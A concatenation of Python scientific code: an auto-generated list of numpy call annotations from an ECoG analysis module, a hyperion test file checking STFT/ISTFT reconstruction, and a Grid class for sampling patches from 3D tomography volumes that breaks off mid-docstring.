... | [((2227, 2255), 'numpy.sqrt', 'np.sqrt', (['(df_band_pwr * f[-1])'], {}), '(df_band_pwr * f[-1])\n', (2234, 2255), True, 'import numpy as np\n'), ((5026, 5052), 'numpy.mean', 'np.mean', (['s_pwr[s_pwr_mask]'], {}), '(s_pwr[s_pwr_mask])\n', (5033, 5052), True, 'import numpy as np\n'), ((5063, 5073), 'numpy.log', 'np.log', (['df'], {}), '(df)\n', (5069, 5073), True, 'import numpy as np\n'), ((5089, 5120), 'numpy.mean', 'np.mean', (['df[s_pwr_mask]'], {'axis': '(0)'}), '(df[s_pwr_mask], axis=0)\n', (5096, 5120), True, 'import numpy as np\n'), ((5139, 5169), 'numpy.std', 'np.std', (['df[s_pwr_mask]'], {'axis': '(0)'}), '(df[s_pwr_mask], axis=0)\n', (5145, 5169), True, 'import numpy as np\n'), ((5386, 5465), 'ecoglib.vis.plot_util.filled_interval', 'filled_interval', (['plt.semilogy', 'f', 's_psd_mn', '(s_psd_lo, s_psd_hi)', 'psd_colors[0]'], {}), '(plt.semilogy, f, s_psd_mn, (s_psd_lo, s_psd_hi), psd_colors[0])\n', (5401, 5465), False, 'from ecoglib.vis.plot_util import filled_interval, light_boxplot\n'), ((5604, 5623), 'numpy.any', 'np.any', (['(~s_pwr_mask)'], {}), '(~s_pwr_mask)\n', (5610, 5623), True, 'import numpy as np\n'), ((8856, 8879), 'numpy.sqrt', 'np.sqrt', (['e_psds', 'e_psds'], {}), '(e_psds, e_psds)\n', (8863, 8879), True, 'import numpy as np\n'), ((9818, 9836), 'numpy.iterable', 'np.iterable', (['pitch'], {}), '(pitch)\n', (9829, 9836), True, 'import numpy as np\n'), ((13151, 13178), 'numpy.iterable', 'np.iterable', (['chan_map.pitch'], {}), '(chan_map.pitch)\n', (13162, 13178), True, 'import numpy as np\n'), ((13425, 13512), 'ecoglib.estimation.spatial_variance.covar_to_iqr_lines', 'covar_to_iqr_lines', (['dist', 'cxx_pairs'], {'binsize': 'binsize', 'linewidths': '(1)', 'colors': 'clrs[0]'}), '(dist, cxx_pairs, binsize=binsize, linewidths=1, colors=\n clrs[0])\n', (13443, 13512), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((13716, 13939), 
'ecoglib.estimation.spatial_variance.matern_semivariogram', 'matern_semivariogram', (['dist'], {'y': 'cxx_pairs', 'theta': '(1)', 'nu': '(1)', 'sill': 'var_mu', 'nugget': '(yb[0] / 5.0)', 'free': "('theta', 'nu', 'nugget', 'sill')", 'dist_limit': '(0.67)', 'wls_mode': '"""irls"""', 'fit_mean': '(True)', 'fraction_nugget': '(False)', 'bounds': 'bounds'}), "(dist, y=cxx_pairs, theta=1, nu=1, sill=var_mu, nugget=\n yb[0] / 5.0, free=('theta', 'nu', 'nugget', 'sill'), dist_limit=0.67,\n wls_mode='irls', fit_mean=True, fraction_nugget=False, bounds=bounds)\n", (13736, 13939), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((15131, 15145), 'seaborn.despine', 'despine', ([], {'fig': 'f'}), '(fig=f)\n', (15138, 15145), False, 'from seaborn import despine, xkcd_rgb\n'), ((16104, 16122), 'numpy.iterable', 'np.iterable', (['pitch'], {}), '(pitch)\n', (16115, 16122), True, 'import numpy as np\n'), ((16881, 16903), 'numpy.arange', 'np.arange', (['(1)', '(ncol + 1)'], {}), '(1, ncol + 1)\n', (16890, 16903), True, 'import numpy as np\n'), ((20812, 20845), 'ecoglib.vis.colormaps.nancmap', 'nancmap', (['"""hot"""'], {'nanc': '"""dodgerblue"""'}), "('hot', nanc='dodgerblue')\n", (20819, 20845), False, 'from ecoglib.vis.colormaps import nancmap\n'), ((21696, 21729), 'ecoglib.vis.colormaps.nancmap', 'nancmap', (['"""hot"""'], {'nanc': '"""dodgerblue"""'}), "('hot', nanc='dodgerblue')\n", (21703, 21729), False, 'from ecoglib.vis.colormaps import nancmap\n'), ((22812, 22906), 'ecoglib.estimation.spatial_variance.plot_electrode_graph', 'plot_electrode_graph', (['cxx', 'chan_map'], {'ax': 'graph_ax', 'stagger_y': 'stagger_y', 'stagger_x': 'stagger_x'}), '(cxx, chan_map, ax=graph_ax, stagger_y=stagger_y,\n stagger_x=stagger_x)\n', (22832, 22906), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((23310, 
23321), 'numpy.log', 'np.log', (['rms'], {}), '(rms)\n', (23316, 23321), True, 'import numpy as np\n'), ((1942, 1955), 'numpy.log', 'np.log', (['s_pwr'], {}), '(s_pwr)\n', (1948, 1955), True, 'import numpy as np\n'), ((2690, 2718), 'numpy.sqrt', 'np.sqrt', (['(gf_band_pwr * f[-1])'], {}), '(gf_band_pwr * f[-1])\n', (2697, 2718), True, 'import numpy as np\n'), ((3419, 3436), 'numpy.any', 'np.any', (['offscreen'], {}), '(offscreen)\n', (3425, 3436), True, 'import numpy as np\n'), ((4864, 4877), 'numpy.log', 'np.log', (['s_pwr'], {}), '(s_pwr)\n', (4870, 4877), True, 'import numpy as np\n'), ((5640, 5663), 'numpy.exp', 'np.exp', (['df[~s_pwr_mask]'], {}), '(df[~s_pwr_mask])\n', (5646, 5663), True, 'import numpy as np\n'), ((6369, 6395), 'numpy.mean', 'np.mean', (['g_pwr[g_pwr_mask]'], {}), '(g_pwr[g_pwr_mask])\n', (6376, 6395), True, 'import numpy as np\n'), ((6410, 6420), 'numpy.log', 'np.log', (['gf'], {}), '(gf)\n', (6416, 6420), True, 'import numpy as np\n'), ((6440, 6471), 'numpy.mean', 'np.mean', (['gf[g_pwr_mask]'], {'axis': '(0)'}), '(gf[g_pwr_mask], axis=0)\n', (6447, 6471), True, 'import numpy as np\n'), ((6494, 6524), 'numpy.std', 'np.std', (['gf[g_pwr_mask]'], {'axis': '(0)'}), '(gf[g_pwr_mask], axis=0)\n', (6500, 6524), True, 'import numpy as np\n'), ((6763, 6863), 'ecoglib.vis.plot_util.filled_interval', 'filled_interval', (['plt.semilogy', 'f', 'g_psd_mn', '(g_psd_lo, g_psd_hi)', 'psd_colors[1]'], {'ax': 'fig.axes[0]'}), '(plt.semilogy, f, g_psd_mn, (g_psd_lo, g_psd_hi), psd_colors\n [1], ax=fig.axes[0])\n', (6778, 6863), False, 'from ecoglib.vis.plot_util import filled_interval, light_boxplot\n'), ((6988, 7007), 'numpy.any', 'np.any', (['(~g_pwr_mask)'], {}), '(~g_pwr_mask)\n', (6994, 7007), True, 'import numpy as np\n'), ((9046, 9069), 'numpy.sqrt', 'np.sqrt', (['g_psds', 'g_psds'], {}), '(g_psds, g_psds)\n', (9053, 9069), True, 'import numpy as np\n'), ((10392, 10432), 'ecoglib.vis.colormaps.nancmap', 'nancmap', (['cmap'], {'nanc': '(0.5, 0.5, 0.5, 
0.5)'}), '(cmap, nanc=(0.5, 0.5, 0.5, 0.5))\n', (10399, 10432), False, 'from ecoglib.vis.colormaps import nancmap\n'), ((11134, 11167), 'numpy.reshape', 'np.reshape', (['centered_rxx', '(-1, x)'], {}), '(centered_rxx, (-1, x))\n', (11144, 11167), True, 'import numpy as np\n'), ((12935, 12958), 'numpy.triu_indices', 'np.triu_indices', (['n'], {'k': '(1)'}), '(n, k=1)\n', (12950, 12958), True, 'import numpy as np\n'), ((13289, 13339), 'numpy.ceil', 'np.ceil', (['(10 * (pitch_x ** 2 + pitch_y ** 2) ** 0.5)'], {}), '(10 * (pitch_x ** 2 + pitch_y ** 2) ** 0.5)\n', (13296, 13339), True, 'import numpy as np\n'), ((14829, 14876), 'ecoglib.estimation.spatial_variance.make_matern_label', 'make_matern_label', ([], {'theta': "p['theta']", 'nu': "p['nu']"}), "(theta=p['theta'], nu=p['nu'])\n", (14846, 14876), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((14893, 14922), 'ecoglib.estimation.spatial_variance.matern_semivariogram', 'matern_semivariogram', (['xm'], {}), '(xm, **p)\n', (14913, 14922), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((16072, 16095), 'numpy.triu_indices', 'np.triu_indices', (['n'], {'k': '(1)'}), '(n, k=1)\n', (16087, 16095), True, 'import numpy as np\n'), ((20628, 20660), 'numpy.percentile', 'np.percentile', (['vals', '[5.0, 95.0]'], {}), '(vals, [5.0, 95.0])\n', (20641, 20660), True, 'import numpy as np\n'), ((21445, 21477), 'numpy.percentile', 'np.percentile', (['vals', '[5.0, 95.0]'], {}), '(vals, [5.0, 95.0])\n', (21458, 21477), True, 'import numpy as np\n'), ((22265, 22292), 'numpy.percentile', 'np.percentile', (['cxx', '[2, 98]'], {}), '(cxx, [2, 98])\n', (22278, 22292), True, 'import numpy as np\n'), ((22375, 22435), 'ecoglib.vis.colormaps.diverging_cm', 'cmaps.diverging_cm', (['clim[0]', 'clim[1]', '((0, 0, 0), (1, 0, 0))'], {}), '(clim[0], clim[1], 
((0, 0, 0), (1, 0, 0)))\n', (22393, 22435), True, 'import ecoglib.vis.colormaps as cmaps\n'), ((23773, 23786), 'numpy.sum', 'np.sum', (['(~mask)'], {}), '(~mask)\n', (23779, 23786), True, 'import numpy as np\n'), ((24074, 24100), 'numpy.ones', 'np.ones', (['chan_map.geometry'], {}), '(chan_map.geometry)\n', (24081, 24100), True, 'import numpy as np\n'), ((24915, 24932), 'numpy.dot', 'np.dot', (['data', 'ref'], {}), '(data, ref)\n', (24921, 24932), True, 'import numpy as np\n'), ((24935, 24951), 'numpy.dot', 'np.dot', (['ref', 'ref'], {}), '(ref, ref)\n', (24941, 24951), True, 'import numpy as np\n'), ((1638, 1666), 'ecogdata.util.get_default_args', 'get_default_args', (['fenced_out'], {}), '(fenced_out)\n', (1654, 1666), False, 'from ecogdata.util import get_default_args\n'), ((2283, 2303), 'numpy.sqrt', 'np.sqrt', (['df_band_pwr'], {}), '(df_band_pwr)\n', (2290, 2303), True, 'import numpy as np\n'), ((2917, 2938), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (2931, 2938), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((4736, 4764), 'ecogdata.util.get_default_args', 'get_default_args', (['fenced_out'], {}), '(fenced_out)\n', (4752, 4764), False, 'from ecogdata.util import get_default_args\n'), ((6052, 6061), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (6058, 6061), True, 'import numpy as np\n'), ((6331, 6347), 'numpy.array', 'np.array', (['[True]'], {}), '([True])\n', (6339, 6347), True, 'import numpy as np\n'), ((7541, 7562), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (7555, 7562), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((8193, 8210), 'numpy.any', 'np.any', (['offscreen'], {}), '(offscreen)\n', (8199, 8210), True, 'import numpy as np\n'), ((10052, 10064), 'numpy.arange', 'np.arange', (['x'], {}), '(x)\n', (10061, 10064), True, 'import numpy as np\n'), ((10115, 10127), 'numpy.arange', 'np.arange', (['y'], {}), '(y)\n', (10124, 10127), 
True, 'import numpy as np\n'), ((10256, 10274), 'numpy.random.rand', 'np.random.rand', (['(50)'], {}), '(50)\n', (10270, 10274), True, 'import numpy as np\n'), ((10276, 10294), 'numpy.random.rand', 'np.random.rand', (['(50)'], {}), '(50)\n', (10290, 10294), True, 'import numpy as np\n'), ((10615, 10647), 'numpy.nanmean', 'np.nanmean', (['centered_rxx'], {'axis': '(0)'}), '(centered_rxx, axis=0)\n', (10625, 10647), True, 'import numpy as np\n'), ((11599, 11620), 'numpy.linspace', 'np.linspace', (['(-1)', '(1)', '(6)'], {}), '(-1, 1, 6)\n', (11610, 11620), True, 'import numpy as np\n'), ((12414, 12435), 'numpy.linspace', 'np.linspace', (['(-1)', '(1)', '(6)'], {}), '(-1, 1, 6)\n', (12425, 12435), True, 'import numpy as np\n'), ((13620, 13631), 'numpy.mean', 'np.mean', (['yb'], {}), '(yb)\n', (13627, 13631), True, 'import numpy as np\n'), ((20488, 20504), 'numpy.isfinite', 'np.isfinite', (['rms'], {}), '(rms)\n', (20499, 20504), True, 'import numpy as np\n'), ((20717, 20731), 'numpy.nanmin', 'np.nanmin', (['rms'], {}), '(rms)\n', (20726, 20731), True, 'import numpy as np\n'), ((20733, 20747), 'numpy.nanmax', 'np.nanmax', (['rms'], {}), '(rms)\n', (20742, 20747), True, 'import numpy as np\n'), ((20949, 20970), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (20963, 20970), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((21305, 21321), 'numpy.isfinite', 'np.isfinite', (['rms'], {}), '(rms)\n', (21316, 21321), True, 'import numpy as np\n'), ((21534, 21548), 'numpy.nanmin', 'np.nanmin', (['rms'], {}), '(rms)\n', (21543, 21548), True, 'import numpy as np\n'), ((21550, 21564), 'numpy.nanmax', 'np.nanmax', (['rms'], {}), '(rms)\n', (21559, 21564), True, 'import numpy as np\n'), ((21857, 21878), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (21871, 21878), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((25074, 25088), 'numpy.log10', 'np.log10', (['gain'], {}), 
'(gain)\n', (25082, 25088), True, 'import numpy as np\n'), ((2754, 2774), 'numpy.sqrt', 'np.sqrt', (['gf_band_pwr'], {}), '(gf_band_pwr)\n', (2761, 2774), True, 'import numpy as np\n'), ((6008, 6028), 'numpy.log', 'np.log', (['sig_baseline'], {}), '(sig_baseline)\n', (6014, 6028), True, 'import numpy as np\n'), ((6258, 6271), 'numpy.log', 'np.log', (['g_pwr'], {}), '(g_pwr)\n', (6264, 6271), True, 'import numpy as np\n'), ((10547, 10583), 'numpy.percentile', 'np.percentile', (['centered_rxx', '[2, 98]'], {}), '(centered_rxx, [2, 98])\n', (10560, 10583), True, 'import numpy as np\n'), ((11239, 11250), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (11247, 11250), True, 'import numpy as np\n'), ((12030, 12041), 'numpy.isnan', 'np.isnan', (['c'], {}), '(c)\n', (12038, 12041), True, 'import numpy as np\n'), ((23952, 23973), 'ecogdata.devices.units.nice_unit_text', 'nice_unit_text', (['units'], {}), '(units)\n', (23966, 23973), False, 'from ecogdata.devices.units import nice_unit_text\n'), ((7064, 7087), 'numpy.exp', 'np.exp', (['gf[~g_pwr_mask]'], {}), '(gf[~g_pwr_mask])\n', (7070, 7087), True, 'import numpy as np\n'), ((11307, 11344), 'numpy.percentile', 'np.percentile', (['c[valid]', '[25, 50, 75]'], {}), '(c[valid], [25, 50, 75])\n', (11320, 11344), True, 'import numpy as np\n'), ((11914, 11942), 'numpy.rollaxis', 'np.rollaxis', (['centered_rxx', '(2)'], {}), '(centered_rxx, 2)\n', (11925, 11942), True, 'import numpy as np\n'), ((12098, 12135), 'numpy.percentile', 'np.percentile', (['c[valid]', '[25, 50, 75]'], {}), '(c[valid], [25, 50, 75])\n', (12111, 12135), True, 'import numpy as np\n'), ((20591, 20606), 'numpy.median', 'np.median', (['vals'], {}), '(vals)\n', (20600, 20606), True, 'import numpy as np\n'), ((21408, 21423), 'numpy.median', 'np.median', (['vals'], {}), '(vals)\n', (21417, 21423), True, 'import numpy as np\n'), ((23518, 23543), 'numpy.ma.masked_invalid', 'np.ma.masked_invalid', (['rms'], {}), '(rms)\n', (23538, 23543), True, 'import numpy as 
np\n'), ((23816, 23829), 'numpy.sum', 'np.sum', (['(~mask)'], {}), '(~mask)\n', (23822, 23829), True, 'import numpy as np\n')] |
"""
Copyright 2019 <NAME> (Johns Hopkins University)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import pytest
import numpy as np
from numpy.testing import assert_allclose
from hyperion.hyp_defs import float_cpu
from hyperion.feats.stft import *
from hyperion.feats.feature_windows import FeatureWindowFactory as FWF
margin = 10


def generate_signal():
    """Create a deterministic 10 s, 16 kHz white-noise test signal.

    The RandomState seed is fixed so every test run sees the same samples.
    """
    sample_rate = 16000
    rng = np.random.RandomState(seed=1024)
    noise = rng.randn(sample_rate * 10).astype(float_cpu(), copy=False)
    return 1024 * noise


s = generate_signal()
def test_stft_hanning_half():
    """STFT -> ISTFT round trip with a 512-point Hanning window, 50% overlap."""
    window = FWF.create("hanning", 512)
    spec = stft(s, frame_length=512, frame_shift=256, fft_length=512, window=window)
    recon = np.real(istft(spec, frame_length=512, frame_shift=256, window=window))
    # trim the edges, where overlap-add reconstruction is incomplete
    reference = s[margin : recon.shape[0] - margin]
    assert_allclose(reference, recon[margin:-margin], rtol=1e-3, atol=1e-1)
def test_strft_hanning_half():
    """Real-valued STRFT -> ISTRFT round trip, 512-point Hanning window, 50% overlap."""
    window = FWF.create("hanning", 512)
    spec = strft(s, frame_length=512, frame_shift=256, fft_length=512, window=window)
    recon = istrft(spec, frame_length=512, frame_shift=256, window=window)
    # trim the edges, where overlap-add reconstruction is incomplete
    reference = s[margin : recon.shape[0] - margin]
    assert_allclose(reference, recon[margin:-margin], rtol=1e-3, atol=1e-1)
def test_stft_povey_10hz():
    """STFT -> ISTFT round trip with a 400-point Povey window (25 ms / 10 ms @ 16 kHz)."""
    window = FWF.create("povey", 400)
    spec = stft(s, frame_length=400, frame_shift=160, fft_length=512, window=window)
    recon = np.real(istft(spec, frame_length=400, frame_shift=160, window=window))
    # trim the edges, where overlap-add reconstruction is incomplete
    reference = s[margin : recon.shape[0] - margin]
    assert_allclose(reference, recon[margin:-margin], rtol=1e-4, atol=1e-2)
def test_strft_povey_10hz():
    """Real-valued STRFT -> ISTRFT round trip with a 400-point Povey window."""
    window = FWF.create("povey", 400)
    spec = strft(s, frame_length=400, frame_shift=160, fft_length=512, window=window)
    recon = istrft(spec, frame_length=400, frame_shift=160, window=window)
    # trim the edges, where overlap-add reconstruction is incomplete
    reference = s[margin : recon.shape[0] - margin]
    assert_allclose(reference, recon[margin:-margin], rtol=1e-4, atol=1e-2)
| [
"hyperion.hyp_defs.float_cpu",
"numpy.testing.assert_allclose",
"hyperion.feats.feature_windows.FeatureWindowFactory.create",
"numpy.random.RandomState"
] | [((402, 434), 'numpy.random.RandomState', 'np.random.RandomState', ([], {'seed': '(1024)'}), '(seed=1024)\n', (423, 434), True, 'import numpy as np\n'), ((584, 610), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""hanning"""', '(512)'], {}), "('hanning', 512)\n", (594, 610), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((847, 897), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.001)', 'atol': '(0.1)'}), '(s_ref, shat, rtol=0.001, atol=0.1)\n', (862, 897), False, 'from numpy.testing import assert_allclose\n'), ((940, 966), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""hanning"""', '(512)'], {}), "('hanning', 512)\n", (950, 966), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((1196, 1246), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.001)', 'atol': '(0.1)'}), '(s_ref, shat, rtol=0.001, atol=0.1)\n', (1211, 1246), False, 'from numpy.testing import assert_allclose\n'), ((1286, 1310), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""povey"""', '(400)'], {}), "('povey', 400)\n", (1296, 1310), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((1547, 1599), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.0001)', 'atol': '(0.01)'}), '(s_ref, shat, rtol=0.0001, atol=0.01)\n', (1562, 1599), False, 'from numpy.testing import assert_allclose\n'), ((1638, 1662), 'hyperion.feats.feature_windows.FeatureWindowFactory.create', 'FWF.create', (['"""povey"""', '(400)'], {}), "('povey', 400)\n", (1648, 1662), True, 'from hyperion.feats.feature_windows import FeatureWindowFactory as FWF\n'), ((1892, 1944), 'numpy.testing.assert_allclose', 'assert_allclose', (['s_ref', 'shat'], {'rtol': '(0.0001)', 'atol': '(0.01)'}), '(s_ref, shat, rtol=0.0001, atol=0.01)\n', 
(1907, 1944), False, 'from numpy.testing import assert_allclose\n'), ((481, 492), 'hyperion.hyp_defs.float_cpu', 'float_cpu', ([], {}), '()\n', (490, 492), False, 'from hyperion.hyp_defs import float_cpu\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
implementation of the patches data structure
"""
import pandas as pd
import os
import glob
import numpy as np
import h5py
import cupy as cp
from multiprocessing import Pool, cpu_count
import functools
import time
from numpy.random import default_rng
import abc
import tensorflow as tf
from tensorflow.keras.layers import UpSampling3D
class Grid(dict):
    def __init__(self, vol_shape, initialize_by = "grid-params", xp = np, **kwargs):
        '''
        A Grid stores the corner coordinates of equally sized rectangular /
        cuboid patches sampled from a big image / volume of shape vol_shape.
        Unlike a generic Patches container, every patch shares a single
        width, so the width is stored as one integer instead of an array.
        The object also behaves as a dict exposing "source", "points" and
        "width".

        Parameters
        ----------
        vol_shape : tuple
            shape of the big volume (2D or 3D)
        initialize_by : str
            "grid-params" - lay patches on a regular grid (kwargs: width, n_points)
            "data"        - use the given points / width (kwargs: points, width)
            "file"        - load a previously dumped grid (kwargs: fpath)
        xp : module
            array backend (numpy or cupy)
        '''
        self.vol_shape = vol_shape
        self.xp = xp
        initializers = {"data": self._set_from_data,
                        "grid-params": self._set_regular_grid,
                        "file": self._load_from_disk}
        self["source"] = initialize_by
        self.points, self.wd = initializers[initialize_by](**kwargs)
        self['points'] = self.points
        self['width'] = self.wd
        return

    def __len__(self):
        # number of patches currently stored
        return len(self.points)

    def dump(self, fpath):
        """Save vol_shape, points and width to an hdf5 file at fpath."""
        # NOTE(review): if xp is cupy, points may need a host transfer before
        # writing -- confirm against the h5py backend in use.
        with h5py.File(fpath, 'w') as hf:
            hf.create_dataset("vol_shape", data = self.vol_shape)
            hf.create_dataset("points", data = self.points)
            hf.create_dataset("width", data = self.wd)
        return

    def _set_regular_grid(self, width = None, n_points = None):
        '''
        Initialize (n, ndim) corner points of non-overlapping patches placed
        on a regular grid covering the full volume.

        Parameters
        ----------
        width : int
            width of a unit patch volume; every dimension of vol_shape must
            be a multiple of width
        n_points : int or None
            if given, keep only a random subset of n_points grid points
            (index-sorted); if None, keep the full grid
        '''
        _ndim = len(self.vol_shape)
        assert not any([self.vol_shape[i] % width > 0 for i in range(_ndim)]), "vol_shape must be multiple of patch width"
        m = list(self.vol_shape)
        p = [width] * _ndim
        nsteps = [int(m[i] // p[i]) for i in range(len(m))]
        stepsize = tuple(p)
        points = []
        if len(m) == 3:
            for ii in range(nsteps[0]):
                for jj in range(nsteps[1]):
                    for kk in range(nsteps[2]):
                        points.append([ii * stepsize[0], jj * stepsize[1], kk * stepsize[2]])
        elif len(m) == 2:
            for ii in range(nsteps[0]):
                for jj in range(nsteps[1]):
                    points.append([ii * stepsize[0], jj * stepsize[1]])
        points = self.xp.asarray(points)
        if n_points is not None:
            # BUGFIX: n_points=None used to be forwarded to rng.choice, which
            # returns a single scalar index and collapses the grid. Now None
            # keeps the full grid and sampling only happens when requested.
            n_points = min(n_points, len(points))
            rng = default_rng()
            idxs = self.xp.sort(rng.choice(points.shape[0], n_points, replace=False))
            points = points[idxs, ...].copy()
        return self.xp.asarray(points).astype(np.uint32), int(width)

    # use this when initialize_by = "file"
    def _load_from_disk(self, fpath = None):
        """Restore vol_shape, points and width from an hdf5 file written by dump()."""
        with h5py.File(fpath, 'r') as hf:
            self.vol_shape = tuple(self.xp.asarray(hf["vol_shape"]))
            return self.xp.asarray(hf["points"]).astype(np.uint32), \
                   int(self.xp.asarray(hf["width"]))

    def _set_from_data(self, points = None, width = None):
        """Adopt an existing (n, ndim) points array and a scalar width."""
        return points.astype(self.xp.uint32), int(width)

    def append(self, more_patches):
        '''
        Append the input grid's points to self in place.

        Parameters
        ----------
        more_patches : Grid
            additional patches to be appended; must share vol_shape and width.
        '''
        if self.vol_shape != more_patches.vol_shape:
            raise ValueError("patches data is not compatible. Ensure that big volume shapes match")
        assert self.wd == more_patches.wd, "this is a Grid data structure. All widths must be equal"
        self.points = self.xp.concatenate([self.points, more_patches.points], axis = 0)
        return

    def slices(self):
        '''
        Get python slice objects from the list of corner coordinates.

        Returns
        -------
        ndarray (n_pts, ndim)
            each element of the (object) array is a slice of length wd
        '''
        _ndim = len(self.vol_shape)
        s = [[slice(self.points[ii, jj], self.points[ii, jj] + self.wd) for jj in range(_ndim)]
             for ii in range(len(self))]
        return self.xp.asarray(s)

    def centers(self):
        '''
        Get centers of the patch volumes.

        Returns
        -------
        ndarray (n_pts, ndim)
            z, y, x coordinates of each patch center
        '''
        _ndim = len(self.vol_shape)
        s = [[int(self.points[ii, jj] + self.wd // 2) for jj in range(_ndim)]
             for ii in range(len(self.points))]
        return self.xp.asarray(s)

    def _is_within_cylindrical_crop(self, mask_ratio, height_ratio):
        '''
        Boolean array marking patches whose centers fall inside a cylinder of
        radius mask_ratio*n/2 and height height_ratio*nz, centered in the volume.
        '''
        assert self.vol_shape[1] == self.vol_shape[2], "must be tomographic CT volume (ny = nx = n)"
        nz, n = self.vol_shape[:2]
        centers = self.centers()
        radii = self.xp.sqrt(self.xp.power(centers[:, 1] - n / 2.0, 2) + self.xp.power(centers[:, 2] - n / 2.0, 2))
        clist1 = radii < mask_ratio * n / 2.0
        heights = self.xp.abs(centers[:, 0] - nz / 2.0)
        clist2 = heights < height_ratio * nz / 2.0
        return clist1 & clist2

    def filter_by_cylindrical_mask(self, mask_ratio = 0.9, height_ratio = 1.0):
        '''
        Selects patches whose centers lie inside a cylindrical volume of radius = mask_ratio*nx/2. This assumes that the volume shape is a tomogram where ny = nx. The patches are filtered along the vertical (or z) axis if height_ratio < 1.0.
        '''
        cond_list = self._is_within_cylindrical_crop(mask_ratio, height_ratio)
        return self.filter_by_condition(cond_list)

    def filter_by_condition(self, cond_list):
        '''
        Select coordinates based on a condition list (e.g. classifier output).

        Parameters
        ----------
        cond_list : ndarray
            shape (n_pts,) or (n_pts, n_conditions); with 2D input a patch is
            kept only when ALL conditions hold.
        '''
        if cond_list.shape[0] != len(self.points):
            raise ValueError("length of condition list must same as the current number of stored points")
        if cond_list.ndim == 2:
            cond_list = self.xp.prod(cond_list, axis = 1)  # AND operator on all conditions
        elif cond_list.ndim > 2:
            raise ValueError("condition list must have 1 or 2 dimensions like so (n_pts,) or (n_pts, n_conditions)")
        return Grid(self.vol_shape, initialize_by = "data",
                    points = self.xp.compress(cond_list, self.points, axis = 0),
                    width = self.wd)

    def copy(self):
        """Return a deep copy of this grid."""
        # BUGFIX: the keyword was previously misspelled "widths", which made
        # every call to copy() raise TypeError in _set_from_data.
        return Grid(self.vol_shape, initialize_by = "data",
                    points = self.points.copy(),
                    width = int(self.wd))

    def select_by_range(self, s_sel):
        '''
        Keep only patches with index in [start, stop).

        Parameters
        ----------
        s_sel : tuple
            range (start, stop)
        '''
        s_sel = slice(s_sel[0], s_sel[1], None)
        return Grid(self.vol_shape, initialize_by = "data",
                    points = self.points.copy()[s_sel, ...],
                    width = self.wd)

    def pop(self, n_pop):
        '''
        Drop n_pop patches and return the remainder as a new Grid.

        Parameters
        ----------
        n_pop : int
            If n_pop is negative, pop from end else pop from beginning
        '''
        if n_pop > 0:
            spop = slice(n_pop, None, None)
        elif n_pop < 0:
            spop = slice(None, n_pop, None)
        else:
            return self.copy()
        return Grid(self.vol_shape, initialize_by = "data",
                    points = self.points.copy()[spop, ...],
                    width = self.wd)

    def rescale(self, fac):
        '''
        Scale the grid (volume shape, corner points and patch width) by an
        integer factor, e.g. to map coordinates onto an upsampled volume.
        '''
        fac = int(fac)
        new_vol_shape = tuple([int(self.vol_shape[i] * fac) for i in range(len(self.vol_shape))])
        return Grid(new_vol_shape, initialize_by = "data",
                    points = self.points.copy() * fac,
                    width = int(self.wd * fac))

    def select_by_indices(self, idxs):
        '''
        Select patches corresponding to the input list of indices.

        Parameters
        ----------
        idxs : list
            list of integers as indices.
        '''
        return Grid(self.vol_shape, initialize_by = "data",
                    points = self.points[idxs].copy(),
                    width = self.wd)

    def select_random_sample(self, n_points):
        '''
        Select a given number of patches randomly without replacement.

        Parameters
        ----------
        n_points : int
            number of patches to keep.
        '''
        rng = default_rng()
        idxs = self.xp.sort(rng.choice(self.points.shape[0], n_points, replace = False))
        return self.select_by_indices(idxs)

    def sort_by(self, feature):
        '''
        Sort patches in ascending order of the given per-patch feature.

        Parameters
        ----------
        feature : ndarray
            array with shape (n_pts,).
        '''
        assert feature.ndim == 1, "feature must be 1D array"
        assert len(feature) == len(self.points), "length mismatch"
        idxs = self.xp.argsort(feature)
        return self.select_by_indices(idxs)

    def extract(self, vol):
        '''
        Returns the volume patches found at the stored corner points of the
        given big volume 'vol'.

        Returns
        -------
        ndarray
            shape is (n_pts, wd, wd, wd)
        '''
        # match the caller's array backend (numpy or cupy)
        xp = cp.get_array_module(vol)
        assert vol.shape == self.vol_shape, "Shape of big volume does not match vol_shape attribute of patches data"
        x = []
        for ii in range(len(self)):
            s = (slice(self.points[ii, 0], self.points[ii, 0] + self.wd),
                 slice(self.points[ii, 1], self.points[ii, 1] + self.wd),
                 slice(self.points[ii, 2], self.points[ii, 2] + self.wd))
            x.append(vol[s])
        return xp.array(x)

    def fill_patches_in_volume(self, sub_vols, vol_out):
        '''
        Write the given sub-volumes (2D or 3D patches) back into vol_out at
